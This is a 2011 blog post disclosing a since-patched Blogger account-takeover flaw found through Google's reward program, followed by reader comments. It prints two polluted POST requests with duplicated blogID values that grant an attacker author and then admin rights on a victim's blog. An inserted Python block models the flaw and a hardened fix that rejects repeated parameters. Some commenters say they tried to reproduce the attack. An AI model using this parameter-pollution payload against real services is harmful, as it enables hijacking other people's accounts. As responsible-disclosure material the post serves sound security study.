Thursday, March 10, 2011

How I Hacked Any Blogger Account


Hi,

This is my first post on my blog, and also my first post about the security vulnerabilities I found through the Google Reward Program.

In the last 2 months I participated in the Google reward program and found some high-severity, serious vulnerabilities.

(First, I want to mention that Google has the best professional, brilliant security team. It is amazing how much Google cares about security and what an amazing job they do to secure their sites. Thanks Adam and the Google Security Team for giving me the chance to show my skills :))

The vulnerability that I want to share first is a critical vulnerability in Blogger (a Google service).

That vulnerability could be used by an attacker to gain administrator privileges over any Blogger account (a permission issue).

Yes, I know it sounds kind of crazy, but it's true :)

Here are the details regarding the issue in the Blogger service.

I found an HTTP Parameter Pollution (HPP) vulnerability in Blogger that allowed an attacker to add himself as an administrator on the victim's Blogger account.

Technical details:

Here are the steps for getting admin control permissions over any Blogger account.

1. The attacker uses the invite author option in Blogger (add authors).

Vulnerability location:

POST /add-authors.do HTTP/1.1

Request:

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite

As you can see, I added two blogID values to my POST request (blogID=attackerblogidvalue&blogID=victimblogidvalue).

The server checks the permissions against the first blogID value but performs the action using the second blogID value.


2. After that, the attacker receives an email to confirm him as an author (the author invitation link). After accepting it, the attacker is added as an author on the victim's account.


3. At this step it becomes possible to modify the attacker's permission from author to administrator.

Vulnerability location:

POST /team-member-modify.do HTTP/1.1

Request:

security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges
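The parameter confusion behind steps 1 and 3, as an added Python model that is not Blogger's code and not from the original post: `vulnerable_add_author` authorizes on the first blogID occurrence but acts on the last, while `hardened_add_author` uses one value for both the check and the action and rejects any request in which a parameter is repeated (a standard HPP mitigation assumed here, not one the post describes). The request bodies, token and ownership table are constructed sample data.

```python
from urllib.parse import parse_qs

# Constructed sample bodies modelled on the post's request shape (not real traffic).
POLLUTED_BODY = ("security_token=attackertoken&blogID=attackerblog&blogID=victimblog"
                 "&authorsList=attacker%40example.com&ok=Invite")
CLEAN_BODY = ("security_token=attackertoken&blogID=attackerblog"
              "&authorsList=attacker%40example.com&ok=Invite")

# Hypothetical ownership table: which blogs a session token may administer.
OWNED_BLOGS = {"attackertoken": {"attackerblog"}}


def vulnerable_add_author(body):
    """Model of the pattern the post describes: the permission check reads the
    first blogID occurrence while the action is performed on the last one.
    Returns the blog the author is added to, or None if the check fails."""
    params = parse_qs(body)
    token = params["security_token"][0]
    checked_blog = params["blogID"][0]    # what the permission check looks at
    target_blog = params["blogID"][-1]    # what the action actually uses
    if checked_blog not in OWNED_BLOGS.get(token, set()):
        return None
    return target_blog


def duplicated_params(body):
    """Names of parameters that appear more than once. Useful both for the
    server-side rejection below and for flagging such requests in access logs."""
    return sorted(k for k, v in parse_qs(body).items() if len(v) > 1)


def hardened_add_author(body):
    """Same action, but every parameter must be single-valued, and the one
    blogID value is used for both the permission check and the action."""
    if duplicated_params(body):
        return None                        # reject polluted requests outright
    params = parse_qs(body)
    token = params["security_token"][0]
    blog = params["blogID"][0]
    if blog not in OWNED_BLOGS.get(token, set()):
        return None
    return blog


if __name__ == "__main__":
    print("vulnerable, polluted:", vulnerable_add_author(POLLUTED_BODY))  # victimblog
    print("hardened, polluted  :", hardened_add_author(POLLUTED_BODY))    # None
    print("hardened, clean     :", hardened_add_author(CLEAN_BODY))       # attackerblog
```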

And?





PoC Video:

2. (Full video download): http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html

(The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.)

Best Regards,
Nir Goldshlager

16 comments:

hhhhhhhhhhhh said...

Is this patched? I tried it but can't get anything but a 404 when I tamper with the authors-add request

[Ben Hayak] said...

Very impressive

keep up the good work !

Unknown said...

Thanks for reporting this issue to us privately. Blogger quickly fixed the problem a few months ago.

Unknown said...

Good work & gl with your new blog.
Anatoli

Unknown said...

great job again from Avnet pen team

Nir Goldshlager said...

(The vulnerability mentioned here has been confirmed patched (very fast) by the Google Security Team a few months ago.)

Raviv Raz said...

Truly one of the first live HPP proofs of concept.
Way to go!

Pouya said...

Nice!
Good idea, Nil.

Unknown said...

Good work, a useful example of how an attacker can exploit other applications affected by this vulnerability.

Cyberdin - Your Cyber Domain Inspector said...

Nice work... HPP is a really great technique.

But you still didn't manage to bypass Comitari Web Protection Suite ;-)

Keep posting these interesting findings...

Anonymous said...

I'm a newbie and trying to do as you did but not successfully :(

Anonymous said...

How can I make you part of my team?

Anonymous said...

Security is the name of my purpose in contacting you: Specially Social Networked profiles to keep forward on a project. I am an art entity (I call myself like that, to avoid political noise when defining "Artist" or worse: "female artist")some pages about in FaceBook Art in Hers, Galeria de Originales, Poesia -- twitter accounts are @imprimattura, @artistcoatl, @textualart other accounts include a number of blogs, parked websites, and unpublished materials: Kind of paralyzed because of security (I've already been attacked and want to protect futures). I wish you get interested in this: I want to innovate, make a cloud installation, publish a different kind of poetry book. Best wishes are to take pirates out and start making a profit.

posixninja said...

Epic work man!! I'm glad we're on the same team ;-)

cabana said...

Yeah, really awesome!! Hats off to you!!!

Unknown said...

Good information here. I will post this information to my Facebook page. It is really very informative for others.
